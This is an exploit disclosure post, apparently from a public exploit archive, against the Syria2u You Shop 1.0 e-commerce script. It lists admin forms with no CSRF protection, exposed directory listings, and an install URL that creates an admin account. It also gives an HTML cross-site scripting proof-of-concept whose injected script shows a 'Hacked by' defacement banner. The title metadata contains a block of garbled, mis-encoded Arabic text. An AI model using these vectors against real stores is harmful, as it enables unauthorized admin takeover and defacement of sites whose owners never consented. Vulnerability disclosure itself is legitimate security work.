Syria2u You Shop 1.0 Cross Site Request Forgery / Cross Site Scripting

Posted on 07 June 2015
| # Title : Syria2u You Shop v1.0 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Ø³ÙÂÂƒØ±Ø¨Øª ÙÂÂŠÙÂÂˆØ´ÙÂÂ€ÙÂÂ€ÙÂÂˆØ¨ ÙÂÂ„ÙÂÂ„ØªØ³ÙÂÂˆÙÂÂ‚ Ø¹Ø¨Ø± Ø§ÙÂÂ„Ø§ÙÂÂ†ØªØ±ÙÂÂ†Øª , ÙÂÂ‚ÙÂÂ… Ø¨Ø§Ø®ØªÙÂÂŠØ§Ø± Ø§ÙÂÂ„ÙÂÂ…Ø¯ÙÂÂŠÙÂÂ†Ø© Ø«ÙÂÂ… ØªÙÂÂ…ØªØ¹ Ø¨Ø§ÙÂÂ„ØªØ³ÙÂÂˆÙÂÂ‚ ÙÂÂÙÂÂŠ ÙÂÂ…Ø¯ÙÂÂŠÙÂÂ†ØªÙÂÂƒ ÙÂÂ…ÙÂÂ† Ø£ÙÂÂŠ ÙÂÂ…ÙÂÂƒØ§ÙÂÂ†
| # Tested on: win8.1 Fr V.(Pro) 15:39 * 23/05/2015
| # Bug : Mullti
| # Download : http://www.syria2u.com/
=======================================

HTML form without CSRF protection :

http://127.0.0.1/YouShop/Admin/system/addImage.php

http://127.0.0.1/YouShop/Admin/system/addVideo.php

http://127.0.0.1/YouShop/Admin/system/cckAddEdit.php

Directory listing :

http://127.0.0.1/YouShop/admin/editor/

http://127.0.0.1/YouShop/files/

http://127.0.0.1/YouShop/admin/cck/

http://127.0.0.1/YouShop/admin/system/

XSS - jQuery v1.8.0 EXploits :

<html>
<head>
 <meta charset="utf-8">
 <title>XSS - jQuery v1.8.0 </title>
 <script src="http://127.0.0.1/YouShop/admin/js/jquery-1.8.0.min.js"></script>
 <script>
 $(function() {
 $('#users').each(function() {
 var select = $(this);
 var option = select.children('option').first();
 select.after(option.text());
 select.hide();
 });
 });
 </script>
</head>

<body>
 <form method="post">
 <p>
 <select id="users" name="users">
 <option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
reflected - jQuery v1.11.1 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
 </select>
 </p>
 </form>
</body>
</html>

Add Admin :

http://127.0.0.1/YouShop/install/index.php?install=3

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------
TOP
Malware :

Last 20
Exploits :

Last 20